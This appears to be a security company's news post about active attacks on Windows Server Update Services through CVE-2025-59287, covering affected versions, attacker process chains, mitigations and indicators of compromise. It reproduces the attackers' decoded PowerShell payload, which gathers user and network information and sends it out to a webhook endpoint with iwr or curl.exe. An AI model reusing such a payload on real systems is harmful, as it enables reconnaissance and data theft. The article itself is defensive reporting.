Urgent: Microsoft WSUS Remote Code Execution Vulnerability Exploited

CVE-2025-59287 WSUS vulnerability Windows Server Update Services remote code execution cybersecurity patch Tuesday CISA UNC6512
Edward Zhou
Edward Zhou

CEO & Co-Founder

 
October 28, 2025 3 min read

TL;DR

  • This article details the critical WSUS vulnerability, CVE-2025-59287, which allows remote code execution. It covers active exploitation by threat actors, the technical details of the flaw affecting various Windows Server versions, and specific attack methodologies observed by security researchers. Essential remediation steps, including immediate patching and temporary workarounds like disabling the WSUS role or blocking ports, are provided to help organizations secure their systems.

WSUS Attacks Exploiting CVE-2025-59287

Multiple organizations are affected by attacks exploiting a critical Windows Server Update Services (WSUS) remote code execution vulnerability identified as CVE-2025-59287. Security researchers and threat intelligence teams are actively monitoring the exploitation of this flaw. Microsoft released an emergency patch and CISA added the bug to its Known Exploited Vulnerabilities catalog.

Microsoft has not yet updated its advisory to acknowledge the active exploitation. Google Threat Intelligence Group (GTIG) stated they are actively investigating exploitation of CVE-2025-59287 by a newly identified threat actor, UNC6512, across multiple victim organizations. GTIG observed the actor conducting reconnaissance and data exfiltration from compromised hosts.

Technical Details of CVE-2025-59287

CVE-2025-59287 affects Windows Server versions 2012 through 2025. It stems from insecure deserialization of untrusted data, allowing unauthenticated attackers to execute arbitrary code on vulnerable systems. Servers without the WSUS role enabled are not affected. Initial fixes for CVE-2025-59287 were issued on October's Patch Tuesday, but these did not fully address the vulnerability, necessitating an emergency update.

Trend Micro's Zero Day Initiative reported approximately 100,000 hits exploiting this bug within seven days. They estimate nearly 500,000 internet-facing servers have the WSUS service enabled. Palo Alto Networks' Unit 42 team observed limited impacted customers. Unit 42's analysis indicates attackers are focused on gaining initial access and performing internal network reconnaissance.

Attack Methodology and Observations

Unit 42 observed the following methodology in attacks exploiting CVE-2025-59287:

  • Initial Access: Attackers target publicly exposed WSUS instances on default TCP ports, 8530 (HTTP) and 8531 (HTTPS).
  • Execution: Malicious PowerShell commands are executed via specific parent processes like wsusservice.exe and w3wp.exe. Huntress observed similar process chains:
    • wsusservice.exe → cmd.exe → cmd.exe → powershell.exe
    • w3wp.exe → cmd.exe → cmd.exe → powershell.exe
  • Reconnaissance: Initial payloads gather intelligence on the internal network environment, including commands like whoami, net user /domain, and ipconfig /all.
  • Data Exfiltration: Collected information is exfiltrated to a remote, attacker-controlled Webhook.site endpoint using a PowerShell payload or curl.exe.

Cortex Xpanse identified approximately 5,500 WSUS instances exposed to the internet. Huntress Labs observed threat actors exploiting the WSUS vulnerability across multiple customers, starting around 2025-10-23 23:34 UTC.

Remediation and Mitigation

Microsoft has recommended temporary workarounds for organizations unable to immediately deploy the emergency patches. As of Oct. 27, the guidance consisted of the following mitigations:

  1. Disable the WSUS Server Role: Disabling the WSUS role removes the attack vector, but prevents the server from distributing updates.
  2. Block High-Risk Ports: Block all inbound traffic to TCP ports 8530 and 8531 on the host-level firewall.

CISA urges organizations to implement Microsoft's updated guidance for the WSUS Remote Code Execution Vulnerability.

Huntress Labs Observations

Figure 1: wsusservice.exe → cmd.exe → cmd.exe → powershell.exe

Image courtesy of Huntress Labs

Huntress Labs observed attackers leveraging exposed WSUS endpoints to send specially crafted requests that triggered a deserialization RCE against the update service. Exploitation activity included spawning Command Prompt and PowerShell via the HTTP worker process and WSUS service binary. Proxy networks were used by the attackers to conduct and obfuscate exploitation.

The PowerShell payload (base64 decoded) used by attackers is:

powershell -ec
try{$r= (&{echo https://[REDACTED]:8531; net user /domain; ipconfig /all} |out-string)+ $Error }catch{$_.ToString()} ;$w="http://webhook.site/[REDACTED]";try{iwr -UseBasicParsing -Uri $w -Body $r -Method Put}catch{curl.exe -k $w --data-binary $r}

This payload enumerates servers for sensitive network and user information and extracts results to a remote webhook.

Indicators of Compromise (IOCs)

Huntress Labs identified the following IOCs:

  • C:\Program Files\Update Services\Logfiles\SoftwareDistribution.log: WSUS log file to review indicators of compromise.
  • C:\inetpub\logs\LogFiles\W3SVC*\u_ex*.log: HTTP service log files to review indicators of compromise.
  • w3wp.exe: HTTP worker process binary.
  • wsusservice.exe: WSUS service process binary.
  • whoami;net user /domain: Observed enumeration command.
  • net user /domain; ipconfig /all: Observed enumeration command.
  • CVE-2025-59287
  • Microsoft
Edward Zhou
Edward Zhou

CEO & Co-Founder

 

CEO & Co-Founder of Gopher Security, leading the development of Post-Quantum cybersecurity technologies and solutions.

Related News

CVE-2025-15467: Critical OpenSSL RCE and DoS Vulnerability Overview
OpenSSL vulnerability

CVE-2025-15467: Critical OpenSSL RCE and DoS Vulnerability Overview

Urgent: OpenSSL 3.x vulnerable to CVE-2025-15467, enabling pre-auth RCE. Learn affected versions, impact, and immediate mitigation steps. Protect your systems now!

By Divyansh Ingle March 10, 2026 4 min read
common.read_full_article
SolarWinds Patches Critical Web Help Desk RCE Vulnerabilities Now
SolarWinds Web Help Desk

SolarWinds Patches Critical Web Help Desk RCE Vulnerabilities Now

Critical RCE & Auth Bypass flaws in SolarWinds Web Help Desk are fixed! Don't risk it. Update to v2026.1 now to protect your systems. Learn more.

By Edward Zhou March 9, 2026 4 min read
common.read_full_article
AI vs Human Hackers: Who Prevails in 2026 Pen Testing?
AI hacking

AI vs Human Hackers: Who Prevails in 2026 Pen Testing?

Discover the results of a groundbreaking study comparing AI agents and human hackers in web vulnerability exploitation. See who prevails and what it means for your security. Read now!

By Jim Gagnard March 6, 2026 6 min read
common.read_full_article
Vulnerability Exploits Lead Cyber Intrusions in 2026 Trends
vulnerability exploits

Vulnerability Exploits Lead Cyber Intrusions in 2026 Trends

Exploits are now the top intrusion method, outpacing phishing. Discover why rapid vulnerability patching is critical and how to bolster your defenses. Read more!

By Edward Zhou March 4, 2026 4 min read
common.read_full_article